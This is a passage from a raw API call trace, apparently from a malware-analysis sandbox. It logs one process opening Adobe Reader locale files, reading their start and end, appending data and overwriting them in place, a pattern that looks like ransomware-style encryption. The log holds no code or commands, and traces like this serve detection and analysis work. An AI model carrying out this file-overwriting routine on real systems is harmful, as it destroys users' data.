lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0xe00 [0077.324] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x0 [0077.324] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0077.324] ReleaseMutex (hMutex=0x168) returned 1 [0077.324] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="IA32.NLD", cchWideChar=8, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8 [0077.324] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="IA32.NLD", cchWideChar=8, lpMultiByteStr=0x1f7344c, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="IA32.NLD", lpUsedDefaultChar=0x0) returned 8 [0077.324] ReadFile (in: hFile=0x1fc, lpBuffer=0x2863a28, nNumberOfBytesToRead=0xe00, lpNumberOfBytesRead=0x2b1f2bc, lpOverlapped=0x0 | out: lpBuffer=0x2863a28*, lpNumberOfBytesRead=0x2b1f2bc*=0xe00, lpOverlapped=0x0) returned 1 [0077.326] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2b1f300*=0) returned 0x0 [0077.326] WriteFile (in: hFile=0x1fc, lpBuffer=0x2863a28*, nNumberOfBytesToWrite=0x1388, lpNumberOfBytesWritten=0x2b1f2d0, lpOverlapped=0x0 | out: lpBuffer=0x2863a28*, lpNumberOfBytesWritten=0x2b1f2d0*=0x1388, lpOverlapped=0x0) returned 1 [0077.328] CloseHandle (hObject=0x1fc) returned 1 [0077.328] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\nl_NL\\SaveAsRTF.NLD" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\nl_nl\\saveasrtf.nld"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1fc [0077.329] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x0 [0077.329] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x4a00 [0077.329] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x0 [0077.329] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0077.329] ReleaseMutex (hMutex=0x168) returned 1 [0077.330] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SaveAsRTF.NLD", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0077.330] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SaveAsRTF.NLD", cchWideChar=13, lpMultiByteStr=0x1f733cc, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SaveAsRTF.NLD", lpUsedDefaultChar=0x0) returned 13 [0077.330] ReadFile (in: hFile=0x1fc, lpBuffer=0x2863a28, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2b1f278, lpOverlapped=0x0 | out: lpBuffer=0x2863a28*, lpNumberOfBytesRead=0x2b1f278*=0x1000, lpOverlapped=0x0) returned 1 [0077.331] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2b1f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2b1f2e8*=0) returned 0x3a00 [0077.332] ReadFile (in: hFile=0x1fc, lpBuffer=0x2863a28, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2b1f278, lpOverlapped=0x0 | out: lpBuffer=0x2863a28*, lpNumberOfBytesRead=0x2b1f278*=0x1000, lpOverlapped=0x0) returned 1 [0077.332] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2b1f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2b1f2e8*=0) returned 0x3a00 [0077.333] WriteFile (in: hFile=0x1fc, lpBuffer=0x2863a28*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x2b1f28c, lpOverlapped=0x0 | out: lpBuffer=0x2863a28*, lpNumberOfBytesWritten=0x2b1f28c*=0x1588, lpOverlapped=0x0) returned 1 [0077.333] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2b1f2bc*=0) returned 0x0 [0077.333] WriteFile (in: hFile=0x1fc, lpBuffer=0x2863a28*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x2b1f28c, lpOverlapped=0x0 | out: lpBuffer=0x2863a28*, lpNumberOfBytesWritten=0x2b1f28c*=0x1000, lpOverlapped=0x0) returned 1 [0077.333] CloseHandle (hObject=0x1fc) returned 1 [0077.333] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\pl_PL\\accessibility.POL" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\pl_pl\\accessibility.pol"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1fc [0077.334] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x0 [0077.334] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0xac00 [0077.334] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x0 [0077.334] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0077.335] ReleaseMutex (hMutex=0x168) returned 1 [0077.335] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="accessibility.POL", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0077.335] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="accessibility.POL", cchWideChar=17, lpMultiByteStr=0x1f88b2c, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="accessibility.POL", lpUsedDefaultChar=0x0) returned 17 [0077.335] ReadFile (in: hFile=0x1fc, lpBuffer=0x2863a28, nNumberOfBytesToRead=0x4000, lpNumberOfBytesRead=0x2b1f278, lpOverlapped=0x0 | out: lpBuffer=0x2863a28*, lpNumberOfBytesRead=0x2b1f278*=0x4000, lpOverlapped=0x0) returned 1 [0077.337] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2b1f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2b1f2e8*=0) returned 0x9c00 [0077.337] ReadFile (in: hFile=0x1fc, lpBuffer=0x2695be8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2b1f278, lpOverlapped=0x0 | out: lpBuffer=0x2695be8*, lpNumberOfBytesRead=0x2b1f278*=0x1000, lpOverlapped=0x0) returned 1 [0077.337] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2b1f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2b1f2e8*=0) returned 0x9c00 [0077.338] WriteFile (in: hFile=0x1fc, lpBuffer=0x2691bb8*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x2b1f28c, lpOverlapped=0x0 | out: lpBuffer=0x2691bb8*, lpNumberOfBytesWritten=0x2b1f28c*=0x1588, lpOverlapped=0x0) returned 1 [0077.339] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2b1f2bc*=0) returned 0x0 [0077.339] WriteFile (in: hFile=0x1fc, lpBuffer=0x2691bb8*, nNumberOfBytesToWrite=0x4000, lpNumberOfBytesWritten=0x2b1f28c, lpOverlapped=0x0 | out: lpBuffer=0x2691bb8*, lpNumberOfBytesWritten=0x2b1f28c*=0x4000, lpOverlapped=0x0) returned 1 [0077.339] CloseHandle (hObject=0x1fc) returned 1 [0077.339] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\pl_PL\\eBook.POL" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\pl_pl\\ebook.pol"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1fc [0077.340] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x0 [0077.340] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x1c00 [0077.340] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x0 [0077.340] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0077.340] ReleaseMutex (hMutex=0x168) returned 1 [0077.341] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="eBook.POL", cchWideChar=9, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0077.341] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="eBook.POL", cchWideChar=9, lpMultiByteStr=0x1f733cc, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="eBook.POL", lpUsedDefaultChar=0x0) returned 9 [0077.341] ReadFile (in: hFile=0x1fc, lpBuffer=0x2863a28, nNumberOfBytesToRead=0x1c00, lpNumberOfBytesRead=0x2b1f2bc, lpOverlapped=0x0 | out: lpBuffer=0x2863a28*, lpNumberOfBytesRead=0x2b1f2bc*=0x1c00, lpOverlapped=0x0) returned 1 [0077.343] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2b1f300*=0) returned 0x0 [0077.343] WriteFile (in: hFile=0x1fc, lpBuffer=0x2695be8*, nNumberOfBytesToWrite=0x2188, lpNumberOfBytesWritten=0x2b1f2d0, lpOverlapped=0x0 | out: lpBuffer=0x2695be8*, lpNumberOfBytesWritten=0x2b1f2d0*=0x2188, lpOverlapped=0x0) returned 1 [0077.344] CloseHandle (hObject=0x1fc) returned 1 [0077.344] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\pl_PL\\ReadOutLoud.POL" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\pl_pl\\readoutloud.pol"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1fc [0077.345] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x0 [0077.345] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x2c00 [0077.345] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x0 [0077.345] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0077.346] ReleaseMutex (hMutex=0x168) returned 1 [0077.346] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ReadOutLoud.POL", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0077.346] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ReadOutLoud.POL", cchWideChar=15, lpMultiByteStr=0x1f7344c, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ReadOutLoud.POL", lpUsedDefaultChar=0x0) returned 15 [0077.346] ReadFile (in: hFile=0x1fc, lpBuffer=0x2863a28, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2b1f278, lpOverlapped=0x0 | out: lpBuffer=0x2863a28*, lpNumberOfBytesRead=0x2b1f278*=0x1000, lpOverlapped=0x0) returned 1 [0077.354] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2b1f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2b1f2e8*=0) returned 0x1c00 [0077.354] ReadFile (in: hFile=0x1fc, lpBuffer=0x2863a28, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2b1f278, lpOverlapped=0x0 | out: lpBuffer=0x2863a28*, lpNumberOfBytesRead=0x2b1f278*=0x1000, lpOverlapped=0x0) returned 1 [0077.356] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2b1f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2b1f2e8*=0) returned 0x1c00 [0077.356] WriteFile (in: hFile=0x1fc, lpBuffer=0x2696c48*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x2b1f28c, lpOverlapped=0x0 | out: lpBuffer=0x2696c48*, lpNumberOfBytesWritten=0x2b1f28c*=0x1588, lpOverlapped=0x0) returned 1 [0077.357] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2b1f2bc*=0) returned 0x0 [0077.357] WriteFile (in: hFile=0x1fc, lpBuffer=0x2696c48*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x2b1f28c, lpOverlapped=0x0 | out: lpBuffer=0x2696c48*, lpNumberOfBytesWritten=0x2b1f28c*=0x1000, lpOverlapped=0x0) returned 1 [0077.357] CloseHandle (hObject=0x1fc) returned 1 [0077.358] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\pl_PL\\updater.POL" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\pl_pl\\updater.pol"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1fc [0077.359] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x0 [0077.359] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x2a00 [0077.359] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x0 [0077.359] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0077.359] ReleaseMutex (hMutex=0x168) returned 1 [0077.359] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="updater.POL", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0077.360] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="updater.POL", cchWideChar=11, lpMultiByteStr=0x1f7358c, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="updater.POL", lpUsedDefaultChar=0x0) returned 11 [0077.360] ReadFile (in: hFile=0x1fc, lpBuffer=0x2696c48, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2b1f278, lpOverlapped=0x0 | out: lpBuffer=0x2696c48*, lpNumberOfBytesRead=0x2b1f278*=0x1000, lpOverlapped=0x0) returned 1 [0078.013] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2b1f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2b1f2e8*=0) returned 0x1a00 [0078.014] ReadFile (in: hFile=0x1fc, lpBuffer=0x1e958a8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2b1f278, lpOverlapped=0x0 | out: lpBuffer=0x1e958a8*, lpNumberOfBytesRead=0x2b1f278*=0x1000, lpOverlapped=0x0) returned 1 [0079.099] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2b1f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2b1f2e8*=0) returned 0x1a00 [0079.099] WriteFile (in: hFile=0x1fc, lpBuffer=0x2864a58*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x2b1f28c, lpOverlapped=0x0 | out: lpBuffer=0x2864a58*, lpNumberOfBytesWritten=0x2b1f28c*=0x1588, lpOverlapped=0x0) returned 1 [0079.099] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2b1f2bc*=0) returned 0x0 [0079.099] WriteFile (in: hFile=0x1fc, lpBuffer=0x1ebf2d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x2b1f28c, lpOverlapped=0x0 | out: lpBuffer=0x1ebf2d8*, lpNumberOfBytesWritten=0x2b1f28c*=0x1000, lpOverlapped=0x0) returned 1 [0079.099] CloseHandle (hObject=0x1fc) returned 1 [0079.100] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\pt_BR\\DigSig.PTB" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\pt_br\\digsig.ptb"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1fc [0079.100] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x0 [0079.100] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x20000 [0079.100] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x0 [0079.100] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0079.101] ReleaseMutex (hMutex=0x168) returned 1 [0079.101] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DigSig.PTB", cchWideChar=10, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0079.101] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DigSig.PTB", cchWideChar=10, lpMultiByteStr=0x1f7356c, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="DigSig.PTB", lpUsedDefaultChar=0x0) returned 10 [0079.101] ReadFile (in: hFile=0x1fc, lpBuffer=0x2864a58, nNumberOfBytesToRead=0x4000, lpNumberOfBytesRead=0x2b1f278, lpOverlapped=0x0 | out: lpBuffer=0x2864a58*, lpNumberOfBytesRead=0x2b1f278*=0x4000, lpOverlapped=0x0) returned 1 [0079.115] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2b1f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2b1f2e8*=0) returned 0x1f000 [0079.115] ReadFile (in: hFile=0x1fc, lpBuffer=0x2696c18, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2b1f278, lpOverlapped=0x0 | out: lpBuffer=0x2696c18*, lpNumberOfBytesRead=0x2b1f278*=0x1000, lpOverlapped=0x0) returned 1 [0079.157] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2b1f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2b1f2e8*=0) returned 0x1f000 [0079.157] WriteFile (in: hFile=0x1fc, lpBuffer=0x1e90018*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x2b1f28c, lpOverlapped=0x0 | out: lpBuffer=0x1e90018*, lpNumberOfBytesWritten=0x2b1f28c*=0x1588, lpOverlapped=0x0) returned 1 [0079.158] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2b1f2bc*=0) returned 0x0 [0079.158] WriteFile (in: hFile=0x1fc, lpBuffer=0x2692be8*, nNumberOfBytesToWrite=0x4000, lpNumberOfBytesWritten=0x2b1f28c, lpOverlapped=0x0 | out: lpBuffer=0x2692be8*, lpNumberOfBytesWritten=0x2b1f28c*=0x4000, lpOverlapped=0x0) returned 1 [0079.158] CloseHandle (hObject=0x1fc) returned 1 [0079.159] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\pt_BR\\PPKLITE.PTB" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\pt_br\\ppklite.ptb"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1fc [0079.159] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x0 [0079.159] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x82000 [0079.160] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x0 [0079.160] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0079.160] ReleaseMutex (hMutex=0x168) returned 1 [0079.160] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PPKLITE.PTB", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0079.160] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PPKLITE.PTB", cchWideChar=11, lpMultiByteStr=0x1f7344c, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PPKLITE.PTB", lpUsedDefaultChar=0x0) returned 11 [0079.160] ReadFile (in: hFile=0x1fc, lpBuffer=0x2882db8, nNumberOfBytesToRead=0xf000, lpNumberOfBytesRead=0x2b1f278, lpOverlapped=0x0 | out: lpBuffer=0x2882db8*, lpNumberOfBytesRead=0x2b1f278*=0xf000, lpOverlapped=0x0) returned 1 [0079.182] ReadFile (in: hFile=0x1fc, lpBuffer=0x2882db8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2b1f278, lpOverlapped=0x0 | out: lpBuffer=0x2882db8*, lpNumberOfBytesRead=0x2b1f278*=0x1000, lpOverlapped=0x0) returned 1 [0079.256] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2b1f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2b1f2e8*=0) returned 0x81000 [0079.256] ReadFile (in: hFile=0x1fc, lpBuffer=0x2867a58, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2b1f278, lpOverlapped=0x0 | out: lpBuffer=0x2867a58*, lpNumberOfBytesRead=0x2b1f278*=0x1000, lpOverlapped=0x0) returned 1 [0079.296] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2b1f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2b1f2e8*=0) returned 0x81000 [0079.297] WriteFile (in: hFile=0x1fc, lpBuffer=0x2691bb8*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x2b1f28c, lpOverlapped=0x0 | out: lpBuffer=0x2691bb8*, lpNumberOfBytesWritten=0x2b1f28c*=0x1588, lpOverlapped=0x0) returned 1 [0079.298] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2b1f2bc*=0) returned 0x0 [0079.298] WriteFile (in: hFile=0x1fc, lpBuffer=0x25a0018*, nNumberOfBytesToWrite=0xf000, lpNumberOfBytesWritten=0x2b1f28c, lpOverlapped=0x0 | out: lpBuffer=0x25a0018*, lpNumberOfBytesWritten=0x2b1f28c*=0xf000, lpOverlapped=0x0) returned 1 [0079.298] WriteFile (in: hFile=0x1fc, lpBuffer=0x25a0018*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x2b1f28c, lpOverlapped=0x0 | out: lpBuffer=0x25a0018*, lpNumberOfBytesWritten=0x2b1f28c*=0x1000, lpOverlapped=0x0) returned 1 [0079.298] CloseHandle (hObject=0x1fc) returned 1 [0079.299] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\pt_BR\\Services\\Services.asfx" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\pt_br\\services\\services.asfx"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1fc [0079.300] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x0 [0079.300] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, 